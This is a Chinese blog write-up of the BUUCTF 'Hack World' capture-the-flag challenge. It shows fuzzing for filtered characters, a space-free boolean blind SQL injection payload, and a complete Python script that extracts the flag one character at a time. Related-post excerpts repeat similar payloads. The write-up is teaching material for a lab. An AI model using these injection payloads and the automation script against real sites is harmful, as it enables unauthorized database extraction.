BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2025-04-16 23:27:28 发布
原创 最新推荐文章于 2025-04-16 23:27:28 发布 · 1.1w 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种通过盲注技术获取数据库中的flag信息的方法。利用特殊字符绕过过滤机制,并通过构造特定的SQL语句实现对目标网站的flag值进行逐位判断。文中还提供了一个Python脚本实例,演示如何自动化这一过程。
该文章已生成可运行项目,

题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World

在这里插入图片描述
在这里插入图片描述
SQL注入

手工测试时发现有过滤,那就先Fuzz测试过滤了哪些字符

在这里插入图片描述
Length=482的都是被过滤的字符

在这里插入图片描述
在这里插入图片描述
测试注入点,发现是盲注,直接查flag表flag字段的内容

Trick

  • 使用中括号()代替空格
  • 常规盲注测试,都无需查库查表查字段了,都给出来,直接查flag内容
id=(select(ascii(mid(flag,1,1))=102)from(flag))

在这里插入图片描述
编写脚本

# -*- coding:utf-8 -*-
# Author: mochu7
import requests
import string

def blind_injection(url):
	flag = ''
	strings = string.printable
	for num in range(1,60):
		for i in strings:
			payload = '(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num,ord(i))
			post_data = {"id":payload}
			res = requests.post(url=url,data=post_data)
			if 'Hello' in res.text:
				flag += i
				print(flag)
			else:
				continue
	print(flag)


if __name__ == '__main__':
	url = 'http://64368c9f-dd87-4c49-b9a1-d4b82e98c87a.node3.buuoj.cn/index.php'
	blind_injection(url)

在这里插入图片描述

本文章已经生成可运行项目
BUUCTF WEB [CISCN2019 华北赛区 Day2 Web1]Hack World
A_dmin的博客
12-14 2892
BUUCTF WEB [CISCN2019 华北赛区 Day2 Web1]Hack World 打开题目,看提示貌似是一个sql注入的题目~~ 进行简单测试,貌似不是报错注入,直接进行盲注测试,构造一波!! 抓包构造:id=1=(1)=1与id=1=(0)=1显示是不一样的: 我们可以根据页面显示来进行注入!!fuzz一波,看看过滤了啥! 482都是被过滤了的: ok,ascii没有被过...
[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_46266956的博客
04-24 766
[CISCN2019 华北赛区 Day2 Web1]Hack World 注入题: 直接抓包burpsuite fuzz测试 过滤了一些关键字,但能够看出来存在bool漏洞 发现当true时,Hello,glzjin wants a girlfriend. fslse时,Error Occured When Fetch Result. 据此,写脚本 import requests import string import time timeout=None def bool_blind(url):
[CISCN2019 华北赛区 Day2 Web1]Hack World1
2301_78919866的博客
06-05 1315
[CISCN2019 华北赛区 Day2 Web1]Hack World1题解
web buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World1
weixin_44214568的博客
03-20 2164
考点:盲注(布尔注入);异或的使用 1.输入1' 提示的是bool(错误),这里没有报错回显,只提示错误,其实就可以判断出是个布尔注入 2. 输入1' or '1=1'# 存在过滤,用bp抓包,fuzz进行爆破,看过滤了什么字符; (看回显,长度为482的都会提示sql注入,即被过滤的字符)这只能确定一部分,在实际操作中因为字符链接,字符本身都会产生新的过滤,注意一下 or的连接语句,空格等 3.根据提示 即从表flag的flag列内提取内容,根据前面的操作可知存在布尔注入,我
buuctf_[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_43952190的博客
07-02 928
Hack World 进入后提示是sql注入,并且给了表和列名。 进行fuzz测试,过滤了很多字符。 主要的union字符被过滤,但select,from没有被过滤。 我们还发现id只有输入12时分别返回Hello, glzjin wants a girlfriend.,Do you want to be my girlfriend?。并且支持异或判断。 所以可以进行布尔盲注读取数据。 id=0^(ascii(substr((select(flag)from(flag)),1,1))&gt
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World1
最新发布
duchuan_的博客
04-16 1644
初始页面。
BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World
Senimo
12-08 584
BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World 启动环境: 提示了存在flag表与flag列,先输入正常内容1: 可以得到正常的回显,再测试2: 再输入999,得到错误提示: 输入2-1时,得到注入提示: 在判断数值型和字符型注入时,可以通过提交数学式的方式,例如:id=2/2,字符型返回id=2的内容,数字型则返回id=1的结果。 输入2/2判断注入类型: 得到正常回显,猜测为数字型的盲注,使用length()方法测试: (length(databas
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 751
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
BUUCTF】[CISCN2019 华北赛区 Day2 Web1]Hack World
aoao331198的博客
04-11 878
明确告诉了flag的位置 输入1 输入其他的基本上都没有错误回显或者信息,采用bool盲注 fuzz一波发现select没有过滤,空格过滤了 1^(ascii(substr((select(flag)from(flag)),1,1))>127) 正常回显,说明方法可行 脚本跑出每一个字符即可 import requests import time url='http://10cb7823-c884-4555-80b8-f586b15e6057.node4.buuoj.cn:81/index..
buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World
m0_63563528的博客
04-05 363
SQL注入,布尔盲注
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World
qq_60829702的博客
10-22 817
使用二分法就是快呀,大家可以运行这两个脚本比较一下,我刚开始是用第二个的,后面用了第一个。这两个就不是一个级别的,这里我编写二分法脚本的时候也出现了一点问题,然后看其他师傅的文章借鉴了一下。看到这里确实是可以的,但是当我们输入id=0的时候也会显示这个错误,所以我们就不需要使用异或了,直接就是布尔盲注就行了。按照正常的思路,就是找到注入点后就看能不能使其闭合了,但没办法过滤了太多了,我们使用bp看一下过滤了哪些东西。我这里有两个脚本一个二分法的,一个就是直接暴力比较的脚本,有需要可以自取。
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
azraelxuemo的博客
07-07 476
大概就是这个题目 我是在buuctf上刷到的 因为buuctf自身的限制,网上很多脚本可能用不了 我就自己改良了一下脚本 大概思路就是盲注 我是利用把flag的每个字符串转化为二进制然后和0比较,这样平均一个字符只需要比较6-7次(因为在字母的ascii较大,为7位,数字和-较小,为6位,这个可以自己在mysql里面测试) select bin(ascii('a')) 而如果直接用字母数字{-}爆破的话需要的次数太多,可能会报不出来 import requests import time flag =.
BUUCTF[CISCN2019 华北赛区 Day2 Web1]Hack World(报错注入)
qq_44657899的博客
03-12 2231
这道题过滤了常用的语句,还过滤了空格和/**/,一番分析之下发现果然我这种菜鸡只能看wp了。 然后学会了一种新的思路 0^(ascii(substr((select(flag)from(flag)),1,1))=ascii('f')) 脚本: import requests import time url='http://76eeac1c-8521-4f23-83f5-9e41b5f7b2d4.n...
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板~感谢!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值